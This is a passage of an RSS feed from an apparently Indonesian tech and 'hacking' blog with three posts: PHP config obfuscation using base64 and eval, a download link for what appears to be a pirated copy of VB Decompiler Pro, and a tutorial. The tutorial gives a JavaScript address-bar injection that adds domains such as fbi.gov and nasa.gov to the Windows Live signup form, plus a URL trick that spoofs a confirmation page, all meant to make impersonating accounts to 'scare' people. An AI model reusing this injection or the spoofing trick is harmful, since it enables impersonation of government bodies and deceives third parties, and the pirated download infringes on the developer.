RuIHQxYmw1IHByNWY0eC4uLiBkNGZmNXI1bnQgcHI1ZjR4IGYyciBkNGZmNXI1bnQgYmwyZy<br />
BzNHQ1DQoNCiR0NG01ejJuNSA9ICcnOyAgICAgICAgIC8vIEdNVCB0NG01IHoybjUNCg0KZDVm<br />
NG41KCdQT1NUX1RCTCcsJHQxYmw1X3ByNWY0eC4icDJzdHMiICk7DQpkNWY0bjUoJ1VTRVJf<br />
VEJMJywkdDFibDVfcHI1ZjR4LiIzczVyIiApOw0KZDVmNG41KCdDQVRfVEJMJywkdDFibDVfcHI1Z<br />
jR4LiJjMXQ1ZzJyeSIgKTsNCmQ1ZjRuNSgnQ09NTUVOVF9UQkwnLCR0MWJsNV9wcjVmNHguIm<br />
MybW01bnQiICk7DQoNCjRuY2wzZDUoJ3M1dHQ0bmcucGhwJyk7DQoNCj8+';eval<br />
(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3<br />
VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIici<br />
LCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='))<br />
?&gt;<br />
</code></p>
<p>Lumayan pusing kan bacanya? Belom tentu semua hacker mampu men decode file encrypt tadi. Apalagi yang masih newbie.</p>
<p>Encrypt php file anda di online php encoder :</p>
<p><a href="http://www.byterun.com/free-php-encoder.php">http://www.byterun.com/free-php-encoder.php</a></p>
<p>Gunakan email yang .com, tidak menerima email yang .co.id atau .web.id dll.<br />
Please note, your LOGIN ID is valid only for 30 minutes since generating.</p>
<p>Konsekuensinya, memang web anda jadi agak berat karena server harus men decode file php config yang di encrypt tadi. Tapi kan lebih aman buat web kita dari serangan hacker.</p>
<p>Hope It&#8217;s Helpfull. <img src='http://catur.web.id/blog/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
No Tags<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://catur.web.id/blog/2007/09/22/free-web-hosting-with-2-gb-space-and-100-gb-bandwidth/" rel="bookmark" class="crp_title">Free Web Hosting With 2 GB Space and 100 GB Bandwidth</a></li><li><a href="http://catur.web.id/blog/2007/07/16/google-apps-free-email-dengan-domain-webid/" rel="bookmark" class="crp_title">Google Apps &#8211; Free Email dengan domain web.id</a></li><li><a href="http://catur.web.id/blog/2007/10/01/yahoo-messenger-status-di-halaman-webblog-anda/" rel="bookmark" class="crp_title">Yahoo Messenger Status di halaman Web/Blog anda.</a></li><li><a href="http://catur.web.id/blog/2007/09/01/terapi-stress/" rel="bookmark" class="crp_title">Terapi Stress</a></li><li><a href="http://catur.web.id/blog/2007/09/06/download-free-sms-mentari-script/" rel="bookmark" class="crp_title">Download Free SMS Mentari Script</a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://catur.web.id/blog/2007/08/13/hacker-php-encoder-encrypt-php-config-make-our-web-safer/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Download VB Decompiler Pro 3.14</title>
		<link>http://catur.web.id/blog/2007/07/29/download-vb-decompiler-pro-314/</link>
		<comments>http://catur.web.id/blog/2007/07/29/download-vb-decompiler-pro-314/#comments</comments>
		<pubDate>Sun, 29 Jul 2007 04:39:00 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://catur.web.id/wp/?p=11</guid>
		<description><![CDATA[Please visit Developer Site at http://www.vb-decompiler.org and read TOS and EULA. Respect developer, use for education only. VB Decompiler is decompiler for programs (EXE, DLL or OCX) written in Visual Basic 5.0/6.0. As you know, programs in Visual Basic can be compiled into interpreted p-code or into native code. Since p-code consists of high-level commands, [...]]]></description>
			<content:encoded><![CDATA[<p>Please visit Developer Site at <a href="http://www.vb-decompiler.org">http://www.vb-decompiler.org</a> and read TOS and EULA. Respect developer, use for education only.  <img src='http://catur.web.id/blog/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<blockquote><p>VB Decompiler is decompiler for programs (EXE, DLL or OCX) written in Visual Basic 5.0/6.0. As you know, programs in Visual Basic can be compiled into interpreted p-code or into native code.</p>
<p>Since p-code consists of high-level commands, there is a real possibility to decompile it into the source code (of course, the names of variables, functions, etc. will not be decompiled). VB Decompiler restores many p-code instructions and although there is a long way to the generation of the source code that can be compiled, the decompiler will make analyzing the program algorithm much easier and partially restore its source code.</p>
<p>If a program was compiled into the native code, restoring the source code from machine instructions is not possible. But VB decompiler can help to analyze the program even in this situation as well. It contains a powerful disassembler that supports Pentium Pro commands including MMX and SSE. It allows you to disassemble all functions. There is also a code analyzer that searches for all API function calls and string references in the disassembled code and changes them into comments for analyzed strings. In general, VB Decompiler is an ideal tool for analyzing programs and it is perfect if you lose the source code and need to partially restore the project.</p></blockquote>
<p>Mau download vb decompiler pro 3.14? Klik</p>
<blockquote><p><a href="http://www.rapidshare.com/files/45673567/VB_Decompiller_Pro_3.4.rar">http://www.rapidshare.com/files/45673567/VB_Decompiller_Pro_3.4.rar</a></p></blockquote>
<blockquote><p>Password : catur.web.id</p></blockquote>
No Tags<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://catur.web.id/blog/2008/12/17/cron-2-database-on-separate-server-to-get-same-content-syncrhonize-content-multiple-site/" rel="bookmark" class="crp_title">Cron 2 database on separate server, to get same content (Syncrhonize content multiple site)</a></li><li><a href="http://catur.web.id/blog/2010/01/15/linux-set-date-and-time-from-a-command-prompt/" rel="bookmark" class="crp_title">Linux Set Date and Time From a Command Prompt</a></li><li><a href="http://catur.web.id/blog/2007/08/08/14/" rel="bookmark" class="crp_title">Menampilkan (Displaying) PHP page generation time.</a></li><li><a href="http://catur.web.id/blog/2009/07/06/ftp-shell-script-for-sending-file-with-auto-login-and-multiple-put/" rel="bookmark" class="crp_title">FTP Shell Script for sending File with auto login and multiple put.</a></li><li><a href="http://catur.web.id/blog/2007/09/16/send-mail-using-php-mailer/" rel="bookmark" class="crp_title">Send Mail Using PHP Mailer</a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://catur.web.id/blog/2007/07/29/download-vb-decompiler-pro-314/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Get your Own Unique msn account</title>
		<link>http://catur.web.id/blog/2007/07/22/get-your-own-unique-msn-account/</link>
		<comments>http://catur.web.id/blog/2007/07/22/get-your-own-unique-msn-account/#comments</comments>
		<pubDate>Sun, 22 Jul 2007 04:28:05 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://catur.web.id/wp/?p=9</guid>
		<description><![CDATA[There are two ways .. the first simple one is to go to https://accountservices.passport.net/reg.srf?fid=RegCredOnlyEASI&#38;sl=1&#38;vv=410&#38;lc=1033 and continue registering from here .. this is the easy way &#8230; Now the ELITE waY 1. Goto http://get.live.com/getlive/overview to start registering your windows live account. 2. Press the sign-up button and you will be presented a form to sign up [...]]]></description>
			<content:encoded><![CDATA[<p>There are two ways ..</p>
<p>the first simple one is to go to https://accountservices.passport.net/reg.srf?fid=RegCredOnlyEASI&amp;sl=1&amp;vv=410&amp;lc=1033</p>
<p>and continue registering from here .. this is the easy way &#8230;</p>
<p>Now the ELITE waY <img src='http://catur.web.id/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>1. Goto http://get.live.com/getlive/overview to start registering your windows live account.</p>
<p>2. Press the sign-up button and you will be presented a form to sign up for a hotmail account.</p>
<p>3.Copy the following javascript injection code:</p>
<p>javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById(&#8220;idomain&#8221;).options);r(d=&#8221;md5this.&#8221;);r(a = new Array(&#8220;hotmail.com&#8221;,&#8221;fbi.gov&#8221;,&#8221;nasa.gov&#8221;,d+&#8221;com&#8221;,d+&#8221;com.au&#8221;,<br />
d+&#8221;be&#8221;,d+&#8221;ca&#8221;,d+&#8221;co.uk&#8221;,d+&#8221;de&#8221;,d+&#8221;fr&#8221;,d+&#8221;it&#8221;/*md5this.com*/,d+&#8221;nl&#8221;));<br />
for (i=0;i&lt;a.length;i++){ s(i ) }alert(&#8220;Success &#8211; additional domains added! md5this.com&#8221;);</p>
<p>4. Paste the code in your address bar (you know, that thing you normally type www.md5this.com.</p>
<p>5. Hit enter, if all went well it should show a message box telling you &#8220;Success &#8211; additional domains added!&#8221;.</p>
<p>6.Now you can select a multitude of domains, fill out the form and you are ready to go!</p>
<p>Now you have a New msn account to scare your friends out <img src='http://catur.web.id/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>play with it &#8230;  enter a @whatever you want <img src='http://catur.web.id/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  chat with people .. <img src='http://catur.web.id/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  scare them <img src='http://catur.web.id/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>beyond that <img src='http://catur.web.id/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById(&#8220;idomain&#8221;).options);r(d=&#8221;toxic.&#8221;);r(a = new Array(&#8220;hotmail.com&#8221;,&#8221;csthis.com&#8221;,&#8221;nasa.gov&#8221;,&#8221;fbi.gov&#8221;,<br />
&#8220;iknowwhatyoudidlastsummer.info&#8221;,d+&#8221;com&#8221;,d+&#8221;com.au&#8221;,d+&#8221;be&#8221;,<br />
d+&#8221;ca&#8221;,d+&#8221;co.uk&#8221;,d+&#8221;de&#8221;,d+&#8221;fr&#8221;,d+&#8221;it&#8221;/*csthis.com*/,d+&#8221;nl&#8221;)); for (i=0;<br />
i&lt;a.length;i++){ s(i ) }alert(&#8220;Success &#8211; additional domains added! thanx to md5this.com!&#8221;);</p>
<p>and here is more &#8230;..</p>
<p>https://account.live.com/MessagePage.aspx?lc=</p>
<p>1033&amp;message=SIconfirmed&amp;param=<br />
%69%68%61%63%6B%65%64%40%6E%61%73%61%2E%67%6F%76%0A</p>
<p>check out the screenshots &#8230;. at the second part of the post. .</p>
<p>Place your mouse pointer on the image to see what happends after the injection &#8230; <img src='http://catur.web.id/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
<a href="http://catur.web.id/blog/files/afterinjection2.jpg" title="Injection" target="_blank"><img src="http://catur.web.id/blog/files/afterinjection2_thumb.jpg" alt="Injection" border="1" height="143" width="200" /></a></p>
No Tags<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://catur.web.id/blog/2007/09/22/contact-mail-form-using-gmail-and-google-apps/" rel="bookmark" class="crp_title">Contact Mail Form Using GMail and Google Apps</a></li><li><a href="http://catur.web.id/blog/2008/03/19/gmail-virtual-drive-best-virtual-life-drive/" rel="bookmark" class="crp_title">GMail Virtual Drive, Best Virtual Live Drive!</a></li><li><a href="http://catur.web.id/blog/2009/01/07/how-to-prevent-email-address-harvesting/" rel="bookmark" class="crp_title">How to prevent email address harvesting</a></li><li><a href="http://catur.web.id/blog/2007/11/04/free-sms-v-220/" rel="bookmark" class="crp_title">Free SMS V 2.2.0</a></li><li><a href="http://catur.web.id/blog/2007/07/21/ways-that-google-detects-invalid-clicks/" rel="bookmark" class="crp_title">Ways that Google detects Invalid clicks</a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://catur.web.id/blog/2007/07/22/get-your-own-unique-msn-account/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

